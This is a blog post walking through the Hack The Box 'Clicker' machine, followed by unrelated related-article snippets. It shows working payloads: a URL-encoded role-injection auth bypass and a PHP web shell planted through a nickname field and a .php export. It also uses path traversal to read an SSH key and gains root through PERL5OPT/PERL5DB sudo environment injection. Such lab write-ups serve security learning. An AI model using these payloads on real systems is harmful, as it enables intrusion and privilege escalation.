Clicker - Linux

最新推荐文章于 2024-07-23 22:52:19 发布
最新推荐文章于 2024-07-23 22:52:19 发布
阅读量490 收藏 7
点赞数 7
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136760434
版权
文章描述了对IP地址10.10.11.232的网络扫描结果,发现了多个开放端口和服务,包括OpenSSH、HTTP、RPC等,并揭示了网站Clicker中的漏洞,如ArbitraryFileWrite、POST扩展利用及环境变量攻击。涉及的漏洞包括登录注册安全和文件操作权限问题。
摘要由CSDN通过智能技术生成

Recon

> echo 10.10.11.232 > ip

> rustscan -b 4500 -a './ip' --ulimit 5000 -- -A -sC -Pn
Open 10.10.11.232:22
Open 10.10.11.232:80
Open 10.10.11.232:111
Open 10.10.11.232:2049
Open 10.10.11.232:37459
Open 10.10.11.232:37827
Open 10.10.11.232:40781
Open 10.10.11.232:59915
Open 10.10.11.232:60457

PORT      STATE SERVICE  REASON  VERSION
22/tcp    open  ssh      syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89d7393458a0eaa1dbc13d14ec5d5a92 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO8nDXVOrF/vxCNHYMVULY8wShEwVH5Hy3Bs9s9o/WCwsV52AV5K8pMvcQ9E7JzxrXkUOgIV4I+8hI0iNLGXTVY=
|   256 b4da8daf659cbbf071d51350edd81130 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAjDCjag/Rh72Z4zXCLADSXbGjSPTH8LtkbgATATvbzv
80/tcp    open  http     syn-ack Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Clicker - The Game
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp   open  rpcbind  syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35547/udp6  mountd
|   100005  1,2,3      42486/udp   mountd
|   100005  1,2,3      55195/tcp6  mountd
|   100005  1,2,3      60457/tcp   mountd
|   100021  1,3,4      35753/udp6  nlockmgr
|   100021  1,3,4      37827/tcp   nlockmgr
|   100021  1,3,4      41853/tcp6  nlockmgr
|   100021  1,3,4      49691/udp   nlockmgr
|   100024  1          42143/tcp6  status
|   100024  1          50743/udp6  status
|   100024  1          55162/udp   status
|   100024  1          59915/tcp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp  open  nfs_acl  syn-ack 3 (RPC #100227)
37459/tcp open  mountd   syn-ack 1-3 (RPC #100005)
37827/tcp open  nlockmgr syn-ack 1-4 (RPC #100021)
40781/tcp open  mountd   syn-ack 1-3 (RPC #100005)
59915/tcp open  status   syn-ack 1 (RPC #100024)
60457/tcp open  mountd   syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 2049

┌──(kali㉿kali)-[~/WorkSpace/Hackthebox/Clicker]
└─$ cd /mnt                                                                                         
┌──(kali㉿kali)-[/mnt]
└─$ sudo mkdir backups

┌──(kali㉿kali)-[/mnt]
└─$ sudo mount -t nfs 10.10.11.232:/mnt/backups /mnt/backups -o nolock 

┌──(kali㉿kali)-[/mnt]
└─$ ls backups 
clicker.htb_backup.zip

┌──(kali㉿kali)-[/mnt]
└─$ cp /mnt/backups/clicker.htb_backup.zip ~/WorkSpace/Hackthebox/Clicker

代码审计

功能点

  • 登录
  • 注册
  • 保存游戏数据
    ![[Pasted image 20230924183752.png]]

其中在 save_game 中会从 GET 请求中获取参数
save_game.php

<?php
session_start();
include_once("db_utils.php");

if (isset($_SESSION['PLAYER']) && $_SESSION['PLAYER'] != "") {
	$args = [];
	foreach($_GET as $key=>$value) {
		if (strtolower($key) === 'role') {
			// prevent malicious users to modify role
			header('Location: /index.php?err=Malicious activity detected!');
			die;
		}
		$args[$key] = $value;
	}
	save_profile($_SESSION['PLAYER'], $_GET);
	// update session info
	$_SESSION['CLICKS'] = $_GET['clicks'];
	$_SESSION['LEVEL'] = $_GET['level'];
	header('Location: /index.php?msg=Game has been saved!');
	
}
?>

Arbitrary file write

post extension

export.php

<?php
session_start();
include_once("db_utils.php");

if ($_SESSION["ROLE"] != "Admin") {
  header('Location: /index.php');
  die;
}

function random_string($length) {
    $key = '';
    $keys = array_merge(range(0, 9), range('a', 'z'));

    for ($i = 0; $i < $length; $i++) {
        $key .= $keys[array_rand($keys)];
    }

    return $key;
}

$threshold = 1000000;
if (isset($_POST["threshold"]) && is_numeric($_POST["threshold"])) {
    $threshold = $_POST["threshold"];
}
$data = get_top_players($threshold);
$currentplayer = get_current_player($_SESSION["PLAYER"]);
$s = "";
if ($_POST["extension"] == "txt") {
    $s .= "Nickname: ". $currentplayer["nickname"] . " Clicks: " . $currentplayer["clicks"] . " Level: " . $currentplayer["level"] . "\n";
    foreach ($data as $player) {
    $s .= "Nickname: ". $player["nickname"] . " Clicks: " . $player["clicks"] . " Level: " . $player["level"] . "\n";
  }
} elseif ($_POST["extension"] == "json") {
  $s .= json_encode($currentplayer);
  $s .= json_encode($data);
} else {
  $s .= '<table>';
  $s .= '<thead>';
  $s .= '  <tr>';
  $s .= '    <th scope="col">Nickname</th>';
  $s .= '    <th scope="col">Clicks</th>';
  $s .= '    <th scope="col">Level</th>';
  $s .= '  </tr>';
  $s .= '</thead>';
  $s .= '<tbody>';
  $s .= '  <tr>';
  $s .= '    <th scope="row">' . $currentplayer["nickname"] . '</th>';
  $s .= '    <td>' . $currentplayer["clicks"] . '</td>';
  $s .= '    <td>' . $currentplayer["level"] . '</td>';
  $s .= '  </tr>';

  foreach ($data as $player) {
    $s .= '  <tr>';
    $s .= '    <th scope="row">' . $player["nickname"] . '</th>';
    $s .= '    <td>' . $player["clicks"] . '</td>'; 
    $s .= '    <td>' . $player["level"] . '</td>';
    $s .= '  </tr>';
  }
  $s .= '</tbody>';
  $s .= '</table>';
} 

$filename = "exports/top_players_" . random_string(8) . "." . $_POST["extension"];
file_put_contents($filename, $s);
header('Location: /admin.php?msg=Data has been saved in ' . $filename);
?>

63 -> $filename = "exports/top_players_" . random_string(8) . "." . $_POST["extension"];
Auth bypass with PHP type Juggling - CYBERNETGEN

clicks=1&level=1&%72%6f%6c%65%3d%22%41%64%6d%69%6e%22%23

nickname=%22%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%52%45%51%55%45%53%54%5b%30%5d%29%3b%3f%3e%22%23

export.php

POST extension=php

execute_query

当选择非 1,2,3,4 时候,dest 可控,接着将 /home/jack/queries/ 路径与 dest 拼接赋值为 name,access 判断是否可读,可以读就会与name 拼接 /usr/bin/mysql -u clicker_db_user --password='clicker_db_password' clicker -v < 可控处
![[Pasted image 20230924200959.png]]

执行命令

www-data@clicker:/opt/manage$ ./execute_query 5 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY---
...[snip]...
-----END OPENSSH PRIVATE KEY---
--------------

ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1

id_rsa 中需要注意格式,补全 --

ROOT

jack@clicker:~$ sudo -l
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jack may run the following commands on clicker:
    (ALL : ALL) ALL
    (root) SETENV: NOPASSWD: /opt/monitor.sh

#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi

set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;

data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
    exit;
else
    timestamp=$(/usr/bin/date +%s)
    /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi

Hacking with Environment Variables

执行,此时 /bin/bash 已经拥有 s 权限位

jack@clicker:~$ sudo PERL5OPT=-d PERL5DB='system("chmod u+s /bin/bash");' /opt/monitor.sh
No DB::DB routine defined at /usr/bin/xml_pp line 9.
No DB::DB routine defined at /usr/lib/x86_64-linux-gnu/perl-base/File/Temp.pm line 870.
END failed--call queue aborted.
jack@clicker:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

切换至 ROOT

jack@clicker:~$ /bin/bash -p
bash-5.1# cat /root/r*
3f58c6611dbc02dad2da3d5e0f77d7e6
赛博雨天
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux系统之部署网页小游戏合集网站
jks212454的博客
02-18 1656
Linux系统之部署网页小游戏合集网站
MIME - 文件类型
EchoChien的博客
06-19 1225
MIME - 文件类型 MIME文件类型是什么? 百科: MIME MIME常见文件类型有哪些? 扩展名 类型/子类型 .123 application/vnd.lotus-1-2-3 .3dml text/vnd.in3d.3dml .3g2 video/3gpp2 .3gp video/3gpp .7z application/x-7z-compressed .a application/octet-stream .aab application/x-auth
Clicker-htb
whale_waves的博客
06-06 732
从这里大致可以知道有web服务使用了rpcbind,是一种通信协议,允许客户端调用远程服务器上的程序或服务。简单来说RPC绑定服务充当了一个服务目录的角色,帮助客户端定位远程RPC服务的端口,从而使客户端能够与服务器进行通信这里所需要注意的是开启的nfs共享NFS共享是在NFS服务器上定义的文件系统或目录,可以被客户端挂载并访问。
鼠标自动点击器linux,鼠标自动点击器PC版下载
weixin_33921444的博客
05-07 1297
Auto Mouse Clicker是一款多功能鼠标自动答题工具,能够帮助用户自动化任何任务,用户能够设置坐标来完成点击任务,帮助用户节省时间解放双手,感兴趣的朋友快来下载使用吧。功能介绍这是一个易于使用的自动鼠标单击程序。它可以使您免于重复单击鼠标的工作。您可以定义点击点和点击间隔。便宜且易于使用,使用热键启动和停止,您可以预览鼠标位置。在桌面上或从程序菜单启动带有快捷方式的自动点击器。现在注意...
自动点击大师(AUTO CLICKER)
热门推荐
定期分享编程干货~
01-12 1万+
[Windows] 实用小工具AutoClicker这是一个简单的鼠标自动点击小程序,可以设置热键、点击次数和时间间隔。帮助你完成繁琐的手动点击操作。自动点击大师(Auto Clicker)软件特性这是一个简单的鼠标自动点击小程序,可以设置热键、点击次数和时间间隔。帮助你完成繁琐的手动点击操作。AutoClicker这款程序能让电脑鼠标自动点击。程序配置起来很简单,通过恰当的设置,实现鼠标的自动点...
linux 服务器 物联网吗,基于linux系统的物联网服务器设计
weixin_31423211的博客
05-06 139
#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SERVERPORT 8888#define BACKLOG...
sd卡烧写linux内核,uboot从SD卡烧写内核和文件系统
weixin_34552424的博客
04-30 697
环境:ubuntu 13.04一、首先制作sd启动盘:插入SD卡sudo dd iflag=dsync oflag=dsync if=tiny210v2-uboot.binof=/dev/mmcblk0 seek=1tiny210v2-uboot.bin来自:http://www.arm9home.net/read.php?tid-80476.html二、SD卡分区卸载SD卡,sudo /sbin...
ubuntu 18.04 安装 Autoware1.13安装
weixin_46002610的博客
09-14 719
链接: https://gitlab.com/libeigen/eigen/-/archive/3.3.7/eigen-3.3.7.tar.gz。另外如果安装过程中包以下错误,也也可以安装高版本的CUDA,并且安上述修改(注:该方法没有测试过,因该可行。编译cpu版本的autoware(注:如果更改了源码,即src文件夹,重新编译autoware工作区即可!将CUDA版本号检查由≤10.0修改为≤10.2,则可以编译通过生成NDT_GPU(根据自己的版本而定)至此,Autoware 1.13安装完成!
出色的社区网站_《最后的我们》中出色的制作系统
weixin_26732881的博客
08-02 6205
出色的社区网站 游戏设计分析 (GAME DESIGN ANALYSIS) The Last of Us became an instant classic the day it was released, back in 2013. At the sunset of the sixth console generation, it felt like Naughty Dog managed to...
AutoClicker - Max Auto Clicker:免费下载Max Auto Clicker,Mouse AutoClicker Robot-开源
05-26
经过测试且100%可正常运行的Max Auto Clicker是高效的跨平台应用程序,因此可用于MS Windows和Linux操作系统。 Max Auto Clicker具有简单易用的界面,易于安装和配置:您可以选择设置鼠标按钮:左键单击,右键单击...
Max Auto Clicker:免费下载 Max Auto Clicker, Mouse AutoClicker Robot-开源
06-22
经过测试且 100% 有效,Max Auto Clicker 是一个高效的跨平台应用程序,因此可用于 Microsoft Windows 和 Linux 操作系统。 Max Auto Clicker 具有简单且用户友好的界面,并且易于安装和配置:您可以选择设置鼠标...
Broxa-Clicker:Broxa Clicker开源
02-11
5. 兼容性:Broxa-Clicker可能兼容多种操作系统,如Windows、MacOS和Linux,适应不同用户的需求。 三、使用Broxa-Clicker的步骤 1. 下载与安装:首先,你需要从Broxa-Clicker的官方仓库或第三方源获取最新版本的...
Linux小程序——进度条
m0_66182473的博客
07-23 507
进度条
Linux】条件变量及生产者消费者模型
2301_78636079的博客
07-23 651
条件变量与生产消费者模型
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 868
Shell脚本的使用
Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 986
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
linux C++ onnxruntime yolov8 视频检测Demo
最新发布
.NET 人工智能实践
07-23 286
linux C++ onnxruntime yolov8 视频检测Demo
Linux——多路复用之select
kkbca的博客
07-19 1140
在前面,我们学习了五种IO模型,对IO有了基本的认识,知道了select效率很高,可以等待多个文件描述符,那他是如何等待的呢?我们又该如何使用呢?
from PyQt5.QtCore import QTimer from PyQt5.QtGui import QCursor from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QLabel, QLineEdit, QPushButton class MouseClicker(QWidget): def init(self): super().init() # 设置窗口标题 self.setWindowTitle("鼠标连点器") # 创建UI界面 self.label_count = QLabel("点击次数:") self.edit_count = QLineEdit() self.label_interval = QLabel("间隔时间(ms):") self.edit_interval = QLineEdit() self.btn_start = QPushButton("开始") # 设置布局 layout_count = QHBoxLayout() layout_count.addWidget(self.label_count) layout_count.addWidget(self.edit_count) layout_interval = QHBoxLayout() layout_interval.addWidget(self.label_interval) layout_interval.addWidget(self.edit_interval) layout_main = QVBoxLayout() layout_main.addLayout(layout_count) layout_main.addLayout(layout_interval) layout_main.addWidget(self.btn_start) self.setLayout(layout_main) # 连接按钮的点击事件 self.btn_start.clicked.connect(self.start_clicking) # 创建计时器 self.timer = QTimer() self.timer.timeout.connect(self.click) def start_clicking(self): # 获取点击次数和间隔时间 count = int(self.edit_count.text()) interval = int(self.edit_interval.text()) # 设置计时器的时间间隔 self.timer.setInterval(interval) # 开始计时器 self.timer.start() # 禁用开始按钮 self.btn_start.setEnabled(False) # 设置光标样式为等待 QApplication.setOverrideCursor(QCursor(QtCore.Qt.WaitCursor)) # 记录已经点击的次数 self.clicked_count = 0 def click(self): # 点击鼠标左键 QCursor().pos() QCursor().setPos(100, 100) QCursor().pos() QApplication.processEvents() # 增加已经点击的次数 self.clicked_count += 1 # 如果达到设定的点击次数,停止计时器并启用开始按钮 if self.clicked_count >= int(self.edit_count.text()): self.timer.stop() self.btn_start.setEnabled(True) # 设置光标样式为默认 QApplication.restoreOverrideCursor() if name == "main": app = QApplication([]) mouse_clicker = MouseClicker() mouse_clicker.show() app.exec_() 打包为可执行文件
05-15
要将Python程序打包为可执行文件,可以使用第三方库PyInstaller。以下是使用PyInstaller将MouseClicker程序打包为可执行...pyinstaller -F --hidden-import PyQt5 --hidden-import PyQt5.QtCore mouse_clicker.py ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值